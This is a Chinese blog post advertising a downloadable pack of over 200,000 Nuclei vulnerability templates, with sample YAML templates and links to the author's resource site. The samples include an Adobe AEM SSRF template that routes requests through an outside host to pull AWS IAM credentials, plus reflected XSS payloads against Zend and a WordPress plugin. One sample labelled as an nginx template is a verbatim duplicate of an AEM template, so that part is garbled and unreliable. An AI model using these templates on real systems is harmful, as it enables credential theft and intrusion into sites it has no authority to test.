1- 杨CC的评价 > 是的,20W+的Nuclei-POC,没有之一。
> 非常牛而逼之。
> 不过,全部都是yaml文件格式的POC,毕竟是Nuclei,一些支持yaml格式的poc可以正常使用。
2- 分类介绍
我们先来看一下总体数量。
从这里可以 看到,总数量拥有208936个poc,
然后,我们再来把目录中的所有poc目录统计一下。
图1
图2
从图1和图2中,可以看到,POC分类有80+个。
而且我们通过观察目录可以发现,包含:adobe、apache、aws、cisco、cnnvd、cnvd、ftp、zfuz、ftp、git、http、java、mysql、nginx、oracle、php、python、ruby、sql、ssh、web、vmware、xss等多个poc分类。
我们下面会将不同的分类进行介绍。
3- 部分POC介绍 3.1 adobe
数量上,我们来看下图
adobe/SSRF-AEM-2018-12809.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 id: aws-key-extraction-ssrf info: name: SSRF CVE-2018-12809 author: x86rd severity: critical description: Checks for exposed AWS keys through SSRF vulnerability. tags: ssrf,aws,exposure requests: - method: GET path: - "{{BaseURL}}//libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=https://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a" - "{{BaseURL}}/app/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=http://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a" - "{{BaseURL}}/api/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.a.11.htm.svg?url=http://aws.osoro.zip/latest/meta-data/iam/security-credentials/ManagedServicesBigBearInstance&23/apil.omniture.com/a&q=a" headers: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US, en; q=0.5 Accept-Encoding: gzip, deflate DNT: "1" Connection: close Upgrade-Insecure-Requests: "1" matchers: - type: regex regex: - "AKIA[0-9A-Z]{16}" - "ASIA[0-9A-Z]{16}" - "AGPA[0-9A-Z]{16}" part: body condition: or
adobe/aem-security-users.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 id: aem-security-users info: name: Adobe AEM Security Users Exposure author: dhiyaneshDk severity: medium reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: misconfig,aem,adobe,exposure requests: - method: GET path: - "{{BaseURL}}/libs/granite/security/content/useradmin.html" matchers-condition: and matchers: - type: word words: - 'AEM Security | Users' - 'trackingelement="create user"' condition: and - type: word part: header words: - text/html - type: status status: - 200
每个文件中都存放着不同的poc,我们这里就不一一介绍了,感兴趣的可以自己去看一下。
3.2 nginx
数量上,我们来看下图
当然,我们现在的话,依然随机挑选几个,进行查看。
nginx/nginx-version-9120.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 id: aem-security-users info: name: Adobe AEM Security Users Exposure author: dhiyaneshDk severity: medium reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: misconfig,aem,adobe,exposure requests: - method: GET path: - "{{BaseURL}}/libs/granite/security/content/useradmin.html" matchers-condition: and matchers: - type: word words: - 'AEM Security | Users' - 'trackingelement="create user"' condition: and - type: word part: header words: - text/html - type: status status: - 200
nginx/snipe-nginx-cache.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 id: snipe-nginx-cache info: name: > Cache Sniper for Nginx <= 1.0.4.2 - Missing Authorization author: topscoder severity: high description: > reference: - https://github.com/topscoder/nuclei-wordfence-cve - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8d0638e-06c5-4884-a14d-4b28ae3ef3f3?source=api-scan classification: cvss-metrics: cvss-score: cve-id: metadata: fofa-query: "wp-content/plugins/snipe-nginx-cache/" google-query: inurl:"/wp-content/plugins/snipe-nginx-cache/" shodan-query: 'vuln:' tags: cve,wordpress,wp-plugin,snipe-nginx-cache,high http: - method: GET redirects: true max-redirects: 3 path: - "{{BaseURL}}/wp-content/plugins/snipe-nginx-cache/readme.txt" extractors: - type: regex name: version part: body group: 1 internal: true regex: - "(?mi)Stable tag: ([0-9.]+)" - type: regex name: version part: body group: 1 regex: - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "snipe-nginx-cache" part: body - type: dsl dsl: - compare_versions(version, '<= 1.0.4.2')
从这里其实也可以看出来,拥有的POC数量还是很多的。
下面我们继续看一个其他的分类。
3.3 xss
数量上,我们来看下图
太强大了。
我们这里就随便挑一个,进行查看。
xss/zend-v1-xss.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 id: zend-v1-xss info: name: ZendFramework 1.12.2 - Cross-Site Scripting author: c3l3si4n severity: medium description: | ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. reference: - https://twitter.com/c3l3si4n/status/1600035722148212737 metadata: verified: true google-query: inurl:"/tests/Zend/Http/" tags: zend,zendframework,xss http: - method: GET path: - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>" - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)>" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"redirection"]' - '"param"' - '<img/src=x onerror=alert(document.domain)' condition: and - type: word part: header words: - text/html - type: status status: - 200
xss/wp-slideshow-xss-11572.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 id: wp-slideshow-xss info: name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: https://www.exploit-db.com/exploits/37948 tags: wordpress,xss,wp-plugin requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word part: header words: - text/html - type: status status: - 200
然后,我们今天就先介绍到这里把,如果你们需要更加详细的介绍,可以去找我的B站,观看相关视频。
4- 下载链接
杨CC资源分享站 找到渗透工具页面。
点击POC/EXP分类。
点击:Nuclei POC 20W+ 即可下载。
5- 结束语
需要技术文章,记得将ycc77.com 添加到书签栏哦~
需要资源,记得将ycc77.cn 添加到书签栏哦~
QQ交流群:660264846
B站: 疯狂的杨CC
抖音: 疯狂的杨CC
快手: 疯狂的杨CC
公众号:SGY安全
91: 疯狂的杨CC
p站: 疯狂的杨CC
